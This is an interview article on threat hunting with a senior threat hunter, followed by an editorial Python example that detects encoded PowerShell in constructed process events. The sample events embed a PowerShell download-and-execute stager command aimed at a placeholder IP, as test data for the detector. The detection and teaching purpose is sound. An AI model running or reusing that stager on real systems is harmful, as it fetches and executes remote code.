In the ever-evolving domains of cyber attack and defense, automated detection has never been enough. Traditional rule/signature-based detection methods have a key weakness that causes them to lag behind the attacks they detect: they are built from attacks that have already been observed, investigated, and reported. That lag, the time between an attacker's first use of a technique and the availability of a signature for it, is the primary reason threat hunting is critical.
Threat hunting is rooted in the scientific method, requiring a hypothesis, a rigorous investigation and observation methodology, and clear, concise, unembellished documentation. In addition to the deep technical skill needed, truly effective threat hunting also requires instinct, curiosity, creativity, and finesse that is partly innate to the hunter and partly born of years of experience administering and defending systems and networks.
Profile of Corey Milligan: Sr. Threat Hunter
Corey Milligan is a senior threat hunter at Cysiv and a retired Army Cyber Corps Warrant Officer. Corey has over nineteen years of expertise in information systems and security, including threat intelligence, intrusion detection and analysis, network and host forensics, event correlation, data engineering, and malware analysis. Before joining Cysiv in 2019, he was a senior threat intelligence analyst and lead threat hunter at Armor Defense. Immediately prior to that, he served in the United States Army Cyber Protection Brigade, where he provided technical leadership and mentorship as the Cyber Operations Planner for a Cyber Protection Team.
In Part 1 of this two-part series, Corey introduces threat hunting and why, for the most effective threat hunters, it is both a science and an art.
Q: What role does threat hunting play in protecting an organization?
Corey Milligan: It really depends on what you want to get out of your threat hunting program. There are multiple valuable outcomes to a threat hunting program that will benefit any organization, including identifying gaps in security controls and sensor coverage, injecting a greater level of threat intelligence into existing security processes, validating and enhancing existing detection capabilities, detecting previously undetected attacks, and supporting incident response and forensics.
Q: What are the common misconceptions about threat hunting?
Milligan: The biggest one is that hiring a threat hunter will instantly take your security level from 0 to 100. I understand that hiring a threat hunter is a big investment, but thinking that they will be able to solve all of your security problems overnight is unrealistic. If your organization’s security maturity is on the low end, and you hire a qualified threat hunter, you have essentially hired a highly qualified security consultant. If, however, your organization has a mature security program, having implemented good asset and software management, access controls, data and network redundancy, and host and network monitoring, a qualified threat hunter will take your program to the next level by helping you identify security gaps you didn’t know existed and the 10 percent of attacks, the advanced attacks, that you didn’t know were targeting you and may have already penetrated your network.
Q: Why has threat hunting become so important?
Milligan: It’s because more and more organizations recognize two things. First, that the cost of a breach, especially in this era of data privacy regulation and digital transformation, far exceeds the cost of a defense-in-depth security strategy. And second, they’ve recognized that threat hunting is an essential part of a proactive strategy. The core tenet of threat hunting is, “assume the breach.” So, if you have a mature security program that is ready to implement threat hunting, it will take you beyond the reactionary, delayed nature of rule/signature-based security tools to help you proactively identify attacks that your tools are either missing or that you are not noticing. This capability is essential today because attackers are constantly evolving their tactics and tools. Relying on rule/signature-based tools is tantamount to accepting that your organization is constantly unprotected from the most advanced attackers. Understandably, some organizations are willing to depend on the 90% solution that automated detection and response tools can provide. What they may not realize is that the other 10% represents the most catastrophic of outcomes. From a risk management point of view, a threat hunter is an important mitigation for the most catastrophic attacks.
Q: What differentiates a threat hunter from a security analyst?
Milligan: It's the level of experience and knowledge. Obviously, security analysts can have a range of experience, but a threat hunter will have years of experience at all levels of host and network management, security analysis, threat intelligence and vulnerability management. And an effective threat hunter will have good knowledge of attacker methodology and an understanding of how to map business processes to the underlying IT infrastructure. If you have someone in your organization who has these skills and experience, especially the attacker and organizational insight, you likely already have a measure of threat hunting, however informal, going on in your organization.
A lot of what a threat hunter will do goes beyond looking for known techniques. I circle back to something from my military days to explain this mindset. There are the known-knowns, the known-unknowns, and the unknown-unknowns. The known-knowns are those attacker tactics and tools that are well covered by the rule/signature-based tools. Where the threat hunters come in is on the unknown side. The known-unknowns are those attacker tactics and tools that are known, but have been modified to elude signature-based detection, are being used in an unexpected way, or are so similar to normal activity that a signature-based detection/prevention capability would do more harm than good. “Next generation” tools that implement machine learning are beginning to cover some of the known-unknowns, but you still need someone with the experience of a threat hunter to validate the findings. Finally, unknown-unknowns stem from previously unobserved tactics and tools. Items that fall into this category include the exploitation of unknown vulnerabilities, novel, or mostly novel, attacker tactics and tools, and the exploitation of normal network or host functionality in a novel way. Depending on the sophistication and patience of the attacker, these will almost always emerge and be detected as anomalies.
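The known-known versus known-unknown distinction above is easy to show in code. The following is an editorial illustration added to this article; it is not Corey's or Cysiv's code and does not describe Cysiv's platform. It runs a literal signature for `-EncodedCommand` and a hypothesis-driven hunt over a handful of constructed process-creation events (hostnames, file paths, parent processes and the stager URL are all made up). The signature catches the textbook form of encoded PowerShell (the known-known). The same tool launched with an abbreviated parameter from a Word process slips past the signature (a known-unknown), but a hunt that decodes any parameter prefix PowerShell would accept and stacks parent/child pairs by frequency surfaces it, together with a reason string the hunter can validate or discard.

```python
"""Signature match vs. hypothesis-driven hunt over constructed process events.

Editorial example, not code from the interview or from Cysiv.
"""
import base64
import re
from collections import Counter


def encode_ps(script: str) -> str:
    """Base64 of UTF-16LE text, the form powershell.exe -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample telemetry: hosts, paths, parents and the stager URL are invented.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s')"
EVENTS = [
    {"host": "ws01", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"host": "ws02", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"host": "ws03", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe"},
    {"host": "ws04", "parent": "svchost.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\ProgramData\mgmt\health.ps1"},
    {"host": "ws05", "parent": "svchost.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\ProgramData\mgmt\health.ps1"},
    # Known-known: the textbook spelling; the literal signature fires.
    {"host": "ws06", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand " + encode_ps(STAGER)},
    # Known-unknown: same tool and payload, abbreviated parameter, Office parent.
    {"host": "ws07", "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -w 1 -enc " + encode_ps(STAGER)},
]

# Rule/signature-style detection: literal match on the documented parameter name.
SIGNATURE = re.compile(r"-EncodedCommand\b", re.IGNORECASE)


def signature_hits(events):
    """Hosts whose command line matches the literal signature."""
    return [e["host"] for e in events if SIGNATURE.search(e["cmdline"])]


def decode_encoded_command(cmdline):
    """Return the decoded script if any switch is a prefix of EncodedCommand (or -ec).

    powershell.exe resolves unambiguous parameter prefixes, so -e, -en, -enc and
    -ec all mean -EncodedCommand; a literal signature only sees one spelling.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] not in "-/":
            continue
        name = tok[1:].lower()
        if name and (name == "ec" or "encodedcommand".startswith(name)):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def stack_parent_child(events):
    """Frequency analysis ("stacking"): how common is each parent -> child pair?"""
    return Counter((e["parent"].lower(), e["image"].lower()) for e in events)


def hunt(events, rare_threshold=1):
    """Hypothesis: encoded PowerShell, or PowerShell from a rare parent, deserves a look.

    One finding per event that satisfies any clause, with the reasons attached so
    the hunter can validate each lead instead of trusting the tool blindly.
    """
    counts = stack_parent_child(events)
    findings = []
    for e in events:
        reasons = []
        script = decode_encoded_command(e["cmdline"])
        if script is not None:
            reasons.append("encoded command: " + script[:40])
        if counts[(e["parent"].lower(), e["image"].lower())] <= rare_threshold:
            reasons.append(f"rare parent/child pair: {e['parent']} -> {e['image']}")
        if reasons:
            findings.append({"host": e["host"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    print("signature hits:", signature_hits(EVENTS))
    for finding in hunt(EVENTS):
        print(finding["host"], *finding["reasons"], sep="\n  ")
```

On the constructed events the signature reports only ws06, while the hunt reports ws06 and ws07, each with two reasons. The rarity threshold is a tunable assumption: in a real environment the hunter sets it from the observed baseline, and a rare pair is a lead to investigate, not a verdict.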
Q: That covers the science of threat hunting. What’s the art of it?
Milligan: Like any profession, there's an art to it once you get to a certain level. The automation and machine learning discussion around threat hunting is focused on the science. The art aspect is what I think differentiates the really good threat hunters from the rest. It comes down to instinct and intuition rooted in experience and an insatiable curiosity. A qualified threat hunter has deep experience spanning multiple domains across IT and security, and the ability to bring more context to what they are seeing. It’s no different by the time you reach the highest levels of any profession, including threat hunting. You will have developed an innate understanding of your craft to the point that you barely have to think about it. That’s where it becomes instinct and intuition. Curiosity is a big differentiator as well — that desire to be constantly learning and to keep pulling every string until you find an answer.
Read more in Part 2, where Corey will discuss the specifics of a successful threat hunt, how Cysiv’s platform supports threat hunting, and how threat hunting will evolve.